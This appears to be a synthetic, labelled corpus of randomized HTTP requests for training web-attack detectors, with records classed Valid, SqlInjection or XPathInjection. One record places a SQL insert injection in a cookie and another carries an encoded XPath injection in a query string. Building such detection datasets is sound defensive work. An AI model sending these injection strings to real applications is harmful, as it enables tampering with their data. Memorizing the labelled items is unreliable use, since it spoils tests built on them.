TE: chunked;q=0.6,chunked;q=0.9,gzip
Trailer: User-Agent
User-Agent: Mozilla/0.9 (X11; U; Solaris 5.8; c2-aa; rv:9.6.3) Gecko/30654013
UA-CPU: 68000
UA-Disp: 1874,1837,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2199x3513
Via: HTTP/7.0 www.hr1uEh.html
Transfer-Encoding: gzip
Upgrade: ezhTe/9.1, i0t/1.3, huh/6.9, rDvATi/7.5
Warning: 954 www.nnennttt.js "hztaw" "Sat, 16 Oct 04 21:52:44 UTC"
X-Forwarded-For: 70.193.7.214
X-Serial-Number: 316874692201616
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

reEdpeshwtT7=e&0Ct1Bzconnect6Gq=165757&u1t=uB7As1Ym&tyU4VT_q2=sonFfromstdinsshb&ipsd3n=ee1hnotpoqeeI&uf1ea4nbeisN=nXUqpwl&aP64vhGM=tstuwN

End - Id: 34260
Start - Id: 15467
class: Valid
GET /otyL/yqB@TlF_UWV/liK2K0tPwiLAUJ/s8l1cCKriEP5r/samhk-EdpKhAEfWEL/tcF9z/OtTis1eNt/iilhlm/Dbevs7oaTvwi.tiff? HTTP/1.0
Host: www.oemis4.gov
Connection: close
Accept: video/quicktime, application/postscript;q=0.8, application/x-tar
Accept-Charset: x-mac-icelandic;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 175.112.207.131
Cookie: hitpeUtro=000
Cookie2: $Version="5"
Date: Fri, 18 Dec 09 02:11:55 CET
ETag: "ZiBCUWSZ7hgjcKng"
Expect: 100-continue
From: ob3Wdni@tbetshmkn.de
If-Modified-Since: Sun, 24 May 09 11:25:55 UTC
If-Unmodified-Since: Sat, 26 Jun 04 02:22:37 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 21 Apr 10 06:13:36 CET
Max-Forwards: 90
MIME-Version: 3.7
Pragma: taznA='beto'
Proxy-Authorization: Digest qop=i6pnbaa
Authorization: NTLM eWVzbGxlaXVlcmVlbXR0N2I2cmZHMm5kc2VlYk1yZmlzcm9n
Range: 14-
Referer: /dfHbes/Asfzr6/n2estm.dll
TE: trailers
Trailer: Warning
User-Agent: Mozilla/3.4 (compatible; taHrphA; Linux i586; eande3r; anmz)
UA-CPU: PowerPC
UA-Disp: 0411,934,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1725x7516
Via: 4.3 245.15.158.103, FTP/3.4 www.nnca.htm, FTP/5.7 www.irrmr.gif
Transfer-Encoding: deflate
Upgrade: oaai/4.0, e9n6fi/8.4, Gqhe/6.6, n3iid/9.5, y6n9/2.9
Warning: 420 106.240.114.147 "giKco" 
X-Forwarded-For: 10.6.38.7
X-Serial-Number: 83246160630295135066
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15467
Start - Id: 42734
class: SqlInjection
POST /RngTh6nu/need/h6ADkhxy8pZ/tzS/138Gj5/e2y0F9nd_oBS1Pv/ru6samAVa./rjZ@/D-mailzechovevalik_wJ/cVi2n-F/tQkoe-kxfzckl/rUD.sh? HTTP/1.0
Content-Length: 169
Content-Language: o,aer,al
Content-Encoding: compress
Content-Location: http://www.Sin3.de/vneh3/dter/wYRdg.wmn
Content-MD5: YW56ZkNhc3VzY25qd1RyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 13 Dec 06 13:43:54 UTC
Last-Modified: Mon, 30 Oct 06 19:59:16 GMT
Host: 223.158.248.0
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: asnourmt-ftsm6, odtt-En, T-swutnci;q=0.6, aue-8;q=0.1
Cache-Control: only-if-cached
Client-ip: 247.216.191.50
Cookie: ic6rbjr7=3068;xpsS=uc0l;7orusrCWG=tatddu;yiafe=tee4Cha;snf=';    insert   into    eozld values(666,'s6','ot',0xfffff)
Date: Wed, 13 Apr 05 14:29:45 CET
ETag: W/"D6SYDo5YCkMgqXZPzEv"
From: lnd9clwh@rteetb.st
If-Modified-Since: Mon, 06 Dec 04 23:47:42 GMT
If-Match: *
If-None-Match: *
Max-Forwards: 665
MIME-Version: 7.4
Authorization: NTLM ZHZyZG5vY1R0dGFuYWVtaWdRZW1lenpkb3d0cGduT2ZyNg==
Referer: /orhv/sheo6twi/eEnsi26.swf
TE: trailers
User-Agent: ibteyyrn
UA-CPU: x86
UA-Disp: 257,411,8
Transfer-Encoding: deflate
Upgrade: wio/7.9, nnng/7.1, s21rm/9.9, ondtA/4.0

kpc4Oqd2tTmoat=37725&adeTo6igntl=oUYwHQU&e7nlms1E=0anloyritetoihtpassd&eeesno7ueon7=8915&Fe5SaSsOLkp=82938621&LFQYvz7IKform=ttaoalawsrylee&rSis=lrdnezeorAeddr&pyy=or57q9

End - Id: 42734
Start - Id: 17852
class: Valid
GET /Wslg/VtichildSoobjectW/v9j/eMOY/qMBfEAd9.bv/ygroup byinsert04q/8slrhame1e/Aazi8TI93bcdbuj9k.htm?_anduzzG=4ec&ediUbtwdaf=oDdM+&meig6eSaxio4d=E%28b0a&EeaotnAtwpbor=ieeehnlfay%2Fs&rahicni=2rEamt&blhr=mac%279%5Dmtelnetiu6jzoou&tk8infHnpsett=bV2Ps&ett=okrl6%3E4&entu2nopi=91399&6e32M7passwd=t8W&otn2ijme=k++%3FesamSt%7Ch&uae0trhi=95983&biesEoesl=xr26sstae9ta5etrm HTTP/1.1
Host: www.aaedorUt.net
Connection: close
Accept: image/*;q=0.8, application/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: Ri-9rrdas;q=0.7, tr-teagaoH;q=0.5, ir-sE7wa
Cache-Control: no-store
Client-ip: 127.87.0.41
Cookie: 4Alohitmpi=enDniSasoiwhhah;5.qH.7L7urRY=6767102;ee0o1sasoRet=suuee;deleteUmbM3Ae@C9=0zrXB
Cookie2: $Version="778"
Date: Fri, 01 Sep 06 08:48:04 GMT
ETag: "jv2bocDD-zS@V6mm"
Expect: 100-continue
From: lrnihbje@e0fdWo.be
If-Modified-Since: Sat, 06 Jan 07 15:09:18 GMT
If-Unmodified-Since: Mon, 24 Sep 07 20:03:41 GMT
If-Match: *
If-None-Match: "EUHLqTAq_Y3ITYq9r6B"
If-Range: Mon, 05 Apr 04 16:04:49 UTC
Max-Forwards: 374
MIME-Version: 8.0
Pragma: pyaogE=f
Proxy-Authorization: Nelt nsnat=ga8es
Authorization: Digest uri=/cied43/n2tr/gSdoo5nw.php3
Range: 5-3
Referer: http://www.uni1.gov/euldl/jirtne/t8dl1.htm
TE: trailers
Trailer: Connection
User-Agent: cidl (euxzp9cbMx; bkhnL-J-j)
UA-CPU: 68000
UA-Disp: 8443,978,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3160x969
Via: FTP/9.9 156.14.24.88
Transfer-Encoding: deflate
Upgrade: tsE/0.1
Warning: 251 www.imAynCn2.html:1876 "wyu5ls5teb2nziefeO" 
X-Forwarded-For: 65.146.203.44
X-Serial-Number: 164483377111827
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17852
Start - Id: 7466
class: Valid
POST /cHcywA_RgnxG.css? HTTP/1.0
Content-Length: 185
Content-Language: gsygNr,tnrcati2,i
Content-Encoding: gzip
Content-Location: /eei0t/T2ot/4FsLe.swf
Content-MD5: Y2V1dHl0dGF1ZWFzYXV2bw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Aug 04 03:23:56 UTC
Last-Modified: Tue, 13 Dec 05 09:00:30 UTC
Host: www.ssn2rom.uk
Connection: close
Accept: audio/x-wav;q=0.6, video/quicktime, image/gif
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.0, identity, compress, deflate, gzip
Accept-Language: *
Cache-Control: RtrH=en
Client-ip: 104.160.13.173
Cookie: ahs=seaotlib;uIltnTRnyre6e=uN6E-5JeXU
Cookie2: $Version="923"
Date: Sun, 22 Apr 07 18:55:48 GMT
ETag: "WGe7-zYKUlhh0kn@YUc3"
Expect: ggtrtSo=eoicVns
From: simeoAtp@bzmstxmta.de
If-Modified-Since: Sun, 05 Nov 06 14:16:22 UTC
If-Unmodified-Since: Tue, 11 Aug 09 19:42:23 UTC
If-Match: "E95nK_AixWXknxP2MErj"
If-None-Match: *
If-Range: "qBmTlWu806NQUFi"
Max-Forwards: 22
MIME-Version: 9.0
Pragma: mi22hAfi=z8efdSwa
Proxy-Authorization: NTLM dDFyZGhPbGkzSG5udWFPdG9zdGk5b2VxZmhkckVvZW5lZGll
Authorization: NTLM dHR3YW9hNnRlYXBvcm5xY25nOGNkaWFlZWw2enRhTjJldHJt
Range: -471
Referer: /oAtnbher/g79edsan/iuemmen.php3
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.8 (compatible; Konqueror/8.8; Linux i586; nh7ol; itDJh3)
UA-CPU: PowerPC
UA-Disp: 634,725,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 871x804
Via: 4.1 www.tecobo.js:937, 5.9 www.rhlzyat.tiff, 3.0 153.202.210.90
Transfer-Encoding: fmir; 9afkauzn=m52drd3n
Upgrade: omrin/0.6
Warning: 422 www.rinltnh.jpeg "aiAkn" 
X-Forwarded-For: 46.39.95.124
X-Serial-Number: 119603156999
----: -----------
~~~~~: ~~~~~~~~~~~~

OhthGb=oNvE&adopptArli=gsmsaq otarPny&Arh9nth=edDkYKwBv&stzo=nRETxhXAKT8V&s9e9a1o=d5-4yd4J&tihlu=7hemucedqrcrxml&siRmgscntoo8l=nnL3i&sMWTZ=9179256145&o7=e1nLbE]0hotelnet%utpassthruW

End - Id: 7466
Start - Id: 48799
class: XPathInjection
GET /cBtdTDF/78HlLcAXF03-GICilXF/thoPleeymtta2byrter/a4E2c7/TobjectY8IxmochajAMJt6Y/N-BAyGxMgJzaXg/caenaSetAeLaieltnB/saWuej1/usrlikeCrmSF514wg/pNueoodaEeEqxcipht.php4?Ieqeis0fnmXnie=Cbrv&rag2m=oEvar&asfatQn9vfhTt=6427&7NTC=0203&FC_mA2Vprocessing-instructionDZuz=rnu5i&16=417278&uly5scroyf3iScu=athueaqusrcdsou&Fxdje=ie%3B%24%40&Tssboeclm=20317++or+++++1%3C++++nf%2Fsiarc%2Fd4%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D170%5D++or+795%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&tsctawaqetwoz=lhN&utdt4cayaeEaen=eo6eciacooei HTTP/1.1
Host: 180.130.135.146
Connection: keep-alive
Accept: image/jpeg;q=0.6
Accept-Charset: shift_jis, utf-8;q=0.3, iso-10646-ucs-2, iso-8859-6
Accept-Encoding: *;q=0.0
Accept-Language: 87atr-at;q=0.1, or6xs2en-ceejls;q=0.2, tcr-htbc;q=0.1, en-lenzrsei
Cache-Control: no-store
Client-ip: 15.151.104.240
Cookie: re=tajc4;CzteNietiv3bsen=4771705
Cookie2: $Version="875"
Date: Fri, 26 May 06 05:02:44 UTC
ETag: W/".EXNWZ0xRZ8f9BV"
Expect: 100-continue
From: aTnmcfs@so3eotuens.gov
If-Modified-Since: Wed, 31 Mar 10 04:19:28 GMT
If-Unmodified-Since: Tue, 08 Sep 09 13:43:45 CET
If-Match: "tFkoQi-2EGQEv1dq-ZST"
If-None-Match: *
If-Range: Wed, 11 Jul 07 11:59:00 CET
Max-Forwards: 756
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: yeerry vuplo=4rasqRlo
Authorization: Digest nonce
Range: -2670
Referer: /seeet3/czlwz7.gif
TE: chunked,deflate,trailers
Trailer: If-Match
User-Agent: Mozilla/3.0 (Windows; U; Windows NT 2.1; sh-ta; rv:5.9.6) Gecko/92785290
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 682x396
Via: HTTP/2.1 www.tsttIrr.htm, 2.7 113.189.150.76
Transfer-Encoding: compress
Upgrade: Abotid/5.1, aaihiE/4.1, eennhd/8.8, 4euri/4.1, ssnsa6/5.8
Warning: 989 42.33.152.171 "ej9c" 
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 9894674694471428
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48799
Start - Id: 301
class: Valid
GET /ennupMih5Ss7rflcaa/cQz8lYIl4ecY42Um/nwlCjAMmh/kghS3o9k6/SaIVAGN8netcatVIYTj/a@wWLUJTRfK0T.v4/hyhkbG1@83fplK9.msf?tneeel2r23anpo4=izemwnsystem%25e%24uqetccatwinntaeF&ajhhtee=lUFUS&E3ySF=tsln%3Ftmps&.4tTog4Y=pi.0E&fbcdai=90026473&aus2m5yoejepDoi=965429&tnqii9=493526375&isphi=itq+Ee&DeeIdeLt8teag=aclsvttnstma&shutdownq0YRKicZ=hn&eHh2eHa=dwhere%7Etunm6stani&ETxnbate=t7tac1EyuEYuhpr&xdrqeo=5 HTTP/1.1
Host: www.tTP9t.fr
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=617
Client-ip: 24.182.70.145
Cookie: sesgls7uqiYieae=41828528;4fnpn79isicte=81;LGmail-m=chgtio
Cookie2: $Version="39"
Date: Thu, 09 Jun 05 11:34:35 GMT
ETag: "k_i2PsOOl.UP9puy.cK"
Expect: khmh=KaAie
From: atOG@okZhh.fr
If-Modified-Since: Sat, 01 Jul 06 14:57:44 UTC
If-Unmodified-Since: Mon, 08 Dec 08 12:04:10 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 754
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: ye6h yMsthsrA=atyake
Authorization: NTLM VHZuTW9kdG9pOHRlbGg3Y250b013ZW1hY3NsYWNoQWloaGVub2pzbg==
Range: 5-,-876
Referer: http://lpncsstn.ch/vteysli/paj89er/Bres.php
TE: gzip;q=0.3
Trailer: Authorization
User-Agent: nmihng (iL.8eY; tEXChZZ@; e.tFJz10H; ewML8zardl; auCaJlk5)
UA-CPU: x86
UA-Disp: 2593,723,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4622x2387
Via: 5.3 www.oyEe03ee.jpg
Transfer-Encoding: identity
Upgrade: aeeh/6.3, fgRaE/4.4
Warning: 753 172.218.58.231 "ldoa" "Wed, 20 Apr 05 05:59:53 UTC"
X-Forwarded-For: 127.92.165.64
X-Serial-Number: 94210
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 301
Start - Id: 12478
class: Valid
GET /rgg1w.PrcNqZ/otbrcnineq5s3r/cmsan/GQGBNHWWH/hpldmsTj2nctrpaitvD/gVtG7t4QA-wkOQ/trQ/-c@_f2.57N/0PoWVlF/9aGX/pyNtta0yotaq1o/Oo.css?lzoteseis2o=9680396&Epd36fedilkel=Sp73qis&Nihscbno=access_logqp9n+admint&Edet5=46302617&Uvy8v=%5B%7CxidnsW HTTP/1.1
Host: 105.250.139.43
Connection: rstH
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.7, identity;q=0.2
Accept-Language: e-sdHTahi
Cache-Control: max-stale=44
Client-ip: 71.219.22.11
Cookie: _VUDcBSIUv=43
Cookie2: $Version="4"
Date: Wed, 02 Mar 05 13:46:41 GMT
ETag: W/"ysFV2@WM0CqMD-G"
Expect: eoaA3tio=as6onmf;mi3td5g1=eeT7
From: a0lewqe@txeohoo.be
If-Modified-Since: Fri, 21 Apr 06 15:18:01 GMT
If-Unmodified-Since: Tue, 09 Mar 04 02:26:52 GMT
If-Match: "JTo7HUTCtM.zmPEM"
If-None-Match: "UZII4pT.z7DojM7xT5"
If-Range: "wTU6OBOLnnOjHa04h0P8"
Max-Forwards: 91
MIME-Version: 5.9
Pragma: tmg='t'
Proxy-Authorization: Digest qop=ttetoa
Authorization: Basic ZVN4YmpkdGY6c3BsZHlh
Range: -6,6265-
Referer: http://dsqscr.org/Tssncgs/hxeAr.js
TE: chunked
Trailer: Upgrade
User-Agent: Mozilla/6.7 (X11; U; SunOS sun4u 9.6; oe-ei; rv:0.0.0) Gecko/81734812
UA-CPU: StrongARM
UA-Disp: 711,789,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 163x254
Via: FTP/8.8 www.wbatcti.jpg:76, 4.5 254.107.73.65
Transfer-Encoding: compress
Upgrade: leln4g/2.4
Warning: 997 139.90.117.24 "bnqtnmr9rievi" 
X-Forwarded-For: 145.136.143.164
X-Serial-Number: 863262
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12478
Start - Id: 21730
class: Valid
GET /UMJXcIAqs83/eaje/eJVD/tfYY.X@@0QOAV/waT/hTeJ/amigfelys.jpg?nmmb1tt7srro=ce%7Ezdoe4%25o&N8EPpasswdd=h+nh%3CreC%3Fthhse&suw=rnpn&aieattTCCn1=7966690&8mhdetd97wNoau=eliltzthens HTTP/1.0
Host: 110.191.221.26
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.9, compress;q=0.9
Accept-Language: *;q=0.5
Cache-Control: min-fresh=65007
Client-ip: 48.110.119.188
Cookie: 2eidhtaoP=ft;gnG=4;ffl9o7a=x8I;X-t3Ky8e='psrh
Cookie2: $Version="9"
Date: Tue, 07 Sep 04 15:07:44 GMT
ETag: "PqpR7XP5.GNrKwl-p@r"
Expect: 100-continue
From: atahe4oK@cEwNqe.fr
If-Modified-Since: Sat, 18 Feb 06 07:25:27 UTC
If-Unmodified-Since: Sun, 30 Apr 06 01:02:05 GMT
If-Match: *
If-None-Match: "WmbaO0Czo0y@@FHu2lLn"
If-Range: "fC3jbu-quAcszywUQ6"
Max-Forwards: 058
MIME-Version: 2.5
Pragma: eiecB=o
Proxy-Authorization: NTLM YnhjaXd1Y2VIY3lJbnplcHNpYVRTZnN0ZW5lczNuZHRqMWxlbmZybGl0cw==
Authorization: AaeaOk yearoead=sgziye3
Range: 2-286,124579-86667
Referer: http://ieesi.biz/pSsnA/irwooE.nsf
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/1.4 (X11; U; SunOS sun4u 9.1; jc-uf; rv:8.9.4) Gecko/53746876
UA-CPU: Sparc
UA-Disp: 079,7856,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 632x3686
Via: FTP/2.6 www.ffbwl.gif
Transfer-Encoding: gzip
Upgrade: Sih/5.8, znid05/1.0, rex/6.4
Warning: 021 178.49.204.19 "exttupaDcea1e" 
X-Forwarded-For: 98.250.132.6
X-Serial-Number: 51402
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21730
Start - Id: 1935
class: Valid
GET /te/itvp3.fYz/2x4YLn/ep4n7rGvt2@D57j/w89H/asfittwhsn6uEd9/exeEidn5IhecxecEb/wcW4ispya8mxn7t/iJhX.Xk2Kg/Mu.php3?wcntpihho=3m3lhNf6qdn&aoadpttn=44&jo4eOeok=4m%27ee&sock_streamATz=gaebaeTk&iobtrzjmnwdeth=262105943&LOi-YWUjd=alB0kE&svXteirAey=5pxliadeaufeh&sRqddnlrsc=pjpidlee&60Eh4go4xhn4=fj&paan=ibPrsnc%2Feiv2%24t+&edu6ojti=5&CT7EU.5Y=+passthrunoepg%5Dh%5D%24esonedocumenth&n2mar0BU=2218355&csbmttunedvestl=T%3A&nerdl7tcHt70rj=sam%3Fd HTTP/1.1
Host: 232.48.136.120:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 157.236.53.20
Cookie: hrinLjND=5lib7;nseL1llfUR=hGculs;AJcGM=bdhiinput owihtpasseeoid0(
Cookie2: $Version="49"
Date: Mon, 25 Aug 08 01:50:20 UTC
ETag: W/"SLmMXLc63s.SN-b7H1Rf"
Expect: onbfaeti
From: sliheOFe@oSenphus.it
If-Modified-Since: Sun, 05 Sep 04 12:22:45 CET
If-Unmodified-Since: Tue, 07 Jun 05 11:27:43 GMT
If-Match: "VDPyOwQczZgx0gdF"
If-None-Match: *
If-Range: Thu, 12 Feb 04 14:32:53 GMT
Max-Forwards: 079
MIME-Version: 1.0
Pragma: 3iin='ohgnh7'
Proxy-Authorization: Basic d0NpYjlsZTo2b2dxbnRl
Authorization: suela 6evhU=rEewqr
Range: -8,9401-9800,-599
Referer: http://www.zett.de/dzhor.nsf
TE: gzip
Trailer: Accept-Encoding
User-Agent: asenea9hdvo3fre
UA-CPU: PowerPC
UA-Disp: 2183,5316,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 4348x363
Via: deNh/4.3 96.38.200.29, 2.1 www.ovoet.tiff, FTP/3.8 86.139.154.102
Transfer-Encoding: oemrbm
Upgrade: diahbn/4.5
Warning: 335 124.7.71.254:492 "wCaa" 
X-Forwarded-For: 204.164.3.151
X-Serial-Number: 539815603365
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1935
Start - Id: 790
class: Valid
GET /hrTlFWaj/@TYUZiUN8cate/adtse/e8kQiyCJxF7kKimm/cU@/rttueuk.dll?sTtBOqlikeY_wht=ianolmiaeeytAtsj&8rnmue9eLie=include+autoexec&bNWfrom=toLIgr&UH-yW3-ns.=53 HTTP/1.0
Host: www.qaGT1epviS.gov
Connection: 0exsoN
Accept: */*
Accept-Charset: x-mac-arabic, iso-8859-4, iso-8859-3, iso-8859-7, x-mac-arabic
Accept-Encoding: 
Accept-Language: ge-dgfhi;q=0.6, cnseze-EZsa, eeeai-sony;q=0.1
Cache-Control: only-if-cached
Client-ip: 255.154.164.96
Cookie: Dspho=TuerttutriiaR;fCOqrprocessing-instruction=wuZIM
Cookie2: $Version="824"
Date: Wed, 25 Jan 06 16:37:08 UTC
ETag: W/"vmSA-6D5iyFnqPDf"
Expect: oetHs=1eAesvAa;yakds0m=fEe3
From: 9ezDa@yesdpeazkR.de
If-Modified-Since: Tue, 01 Jun 04 17:02:27 CET
If-Unmodified-Since: Wed, 04 May 05 03:56:44 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 584
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM dHRtN29tZWlhZW5xdG90UmlldG44U2FyZWVyYzdueHRhNmFmZHNobEVybG4=
Authorization: i0h8i marAl=seorrrne
Range: -8809,701-32,26-
Referer: http://IrKs3i.biz/myemtae/yaonp/2kAtl0/nttei.dll
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.3 (X11; U; Linux i586 5.3; it-kh; rv:7.9.7) Gecko/45074751
UA-CPU: StrongARM
UA-Disp: 2800,8749,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 305x8403
Via: 1.0 209.255.243.223:39198, Y3u/5.2 252.231.17.157:790, 8.8 5.174.214.238
Transfer-Encoding: gzip
Upgrade: zufZE2/7.5, owei/6.5, slroee/5.9
Warning: 303 www.herida.css "typL" "Tue, 07 Mar 06 04:42:54 GMT"
X-Forwarded-For: 183.29.19.247
X-Serial-Number: 40823
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 790
Start - Id: 11402
class: Valid
GET /cmooAleratwiaua/9nmAnhdEiewau8ae3i8o/hvteCdtiemtor/s_NwNZ1/e7lbh/quio4t.mdb? HTTP/1.0
Host: 240.59.184.253
Connection: 8yhrn
Accept: */*;q=0.5
Accept-Charset: iso-8859-7;q=0.5, euc-tw;q=0.8, cp-932
Accept-Encoding: identity, deflate, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 70.90.100.107
Cookie: rsAqy5mtoucnr=byioToNnsnulloeilW;izoGgmcSame=56587767;AfhtThLErh=nEtorjEch7e;ti=702805
Cookie2: $Version="296"
Date: Tue, 01 Mar 05 09:49:29 CET
ETag: "RZ2m-ikEP5r@5ZO4xnn"
Expect: diCxno
From: snso@neess.uk
If-Modified-Since: Mon, 18 May 09 07:10:27 GMT
If-Unmodified-Since: Thu, 23 Mar 06 24:21:20 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 29 Jan 05 08:41:21 GMT
Max-Forwards: 339
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM dHN0TGN4NmVua2VzZGh4d3luZnJjM01TZnc4Tk51VGV6WmpubGVz
Authorization: Digest algorithm=MD5-sess
Range: -422,-567468,98305-
Referer: /tcsiRoi/ala1c.php
TE: trailers,gzip;q=0.9,gzip;q=0.3
Trailer: Connection
User-Agent: epncatoB0o (a7MPm3B2; smH5@.-sgq; tu361zN; xvu_AJb6; eYiFte-)
UA-CPU: Sparc
UA-Disp: 299,1774,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7012x529
Via: s6nas/1.5 www.onE7iut.png, gizxei/3.3 www.akcboe.jpg, o0c/7.4 154.87.222.234
Transfer-Encoding: compress
Upgrade: tmmsns/7.8, ettTn/1.8
Warning: 549 54.14.146.24 "veiinschlftang5nhhmr" 
X-Forwarded-For: 194.171.248.197
X-Serial-Number: 99503371855760774661
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 11402
Start - Id: 26534
class: Valid
GET /Uek7sNE.png? HTTP/1.0
Host: 67.186.94.201:80
Connection: oernP
Accept: */*;q=0.2
Accept-Charset: x-mac-icelandic;q=0.1, iso-8859-9, windows-874
Accept-Encoding: *
Accept-Language: enec-rnaanona, t-trheh;q=0.6
Cache-Control: no-transform
Client-ip: 9.2.33.29
Cookie: s0isnqu=eDntovarandaqpl<2z;piro3seH=7;wd5rxhiatu=4;jittnhl=esi
Cookie2: $Version="58"
Date: Thu, 06 Apr 06 20:28:18 GMT
ETag: W/"jSC75tGlEgZvB_Lgo"
Expect: 100-continue
From: 2oida@icenhE.de
If-Modified-Since: Sun, 30 Nov 08 20:37:59 UTC
If-Unmodified-Since: Sun, 11 May 08 10:39:15 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 13 Jul 08 18:57:58 UTC
Max-Forwards: 54
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: CrcHl 7otge=ez2Tr
Authorization: NTLM cnRlbGk4YXJkaHNnTW5jRmE3c29vd3Q4dG44YWRlblRlZ1VvbzdvZWhlZzk4ZQ==
Range: -51243,13953-
Referer: http://www.reei.fr/hxwsooql/icynb/lrru/ed4sneha.ace
TE: gzip;q=0.9,deflate
Trailer: Range
User-Agent: taHe6o84 (o4w5Xz; e16f_RRfNM; acZOrZ; outhuA; y9q_QqK8qt)
UA-CPU: MIPS
UA-Disp: 7109,7775,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 987x6257
Via: HTTP/3.7 36.219.85.161, 0.6 www.eOltoe.htm, HTTP/5.9 www.yalwn.shtml
Transfer-Encoding: deflate
Upgrade: t7nkm/4.3, ho2Bts/8.8, n0ao/6.2, teo/7.9
Warning: 846 www.8izeOwa.css "ycneewrAaeCe" "Sun, 10 Oct 04 21:50:35 CET"
X-Forwarded-For: 240.213.194.27
X-Serial-Number: 693373977262
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26534
Start - Id: 25588
class: Valid
GET /9snhmh/glsGttehf/keeo/cnyqAhA5ig8ph/aseA1nEe8NxonHP/jEXvaVXMmMxN.jpg?asnioa=74&m8ekm=4513&ZGlIksx0echog.@=am3K%40&YbqDuTj4processing-instructionqnJ=urEe%28&rfORZJT=qeo%5ClN&AlahNo40=904753&4kepadusv=77&sjiuufO7ce17sih=1paItz0hiRto&er=httpseg%5C&amVmy=ostylenhttpktcrhw9e%3D%3F&ss=t_HKNByRLTCr HTTP/1.1
Host: 255.87.9.78
Connection: keep-alive
Accept: audio/x-wav;q=0.3, application/*;q=0.4, application/*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nlckeen-acSHeE;q=0.7, cbtie2ic-DeF, Etesi-bcribD, tiorst-7syesn;q=0.9
Cache-Control: max-age=3534
Client-ip: 252.120.238.19
Cookie: mIrspaiaibfdm=gtd-30;4d=484711
Cookie2: $Version="432"
Date: Mon, 05 Dec 05 11:28:34 GMT
ETag: "NNBf2owU_ntQDH3l5"
Expect: 100-continue
From: camaabz@oEUygi.cz
If-Modified-Since: Sun, 22 Feb 09 21:43:33 CET
If-Unmodified-Since: Tue, 06 Nov 07 13:48:33 CET
If-Match: "pbFbhnMpeLuxlvC"
If-None-Match: *
If-Range: Sun, 12 Jun 05 17:24:19 UTC
Max-Forwards: 801
MIME-Version: 6.8
Pragma: ae0f='c'
Proxy-Authorization: NTLM bmplYW5kMmVvaHNvb3NlZjdxdDRlZWl3Y3VkYWpha2ZiaHRzaWVUaWV5
Authorization: NTLM ZWFvY2RoamFlNGNUdXNwWVdhc3NocE9uRWllblVkUm10em91YXdkaWc=
Range: 286-,8185-
Referer: /eXfSs/rtaxsplr/Z8bno.sh
TE: trailers,deflate,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/7.1 (X11; U; Solaris 7.9; oi-ub; rv:4.3.8) Gecko/29781918
UA-CPU: Sparc
UA-Disp: 8439,526,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 437x001
Via: FTP/7.9 228.193.169.87, 8.2 190.255.93.65
Transfer-Encoding: compress
Upgrade: ohwH/4.5
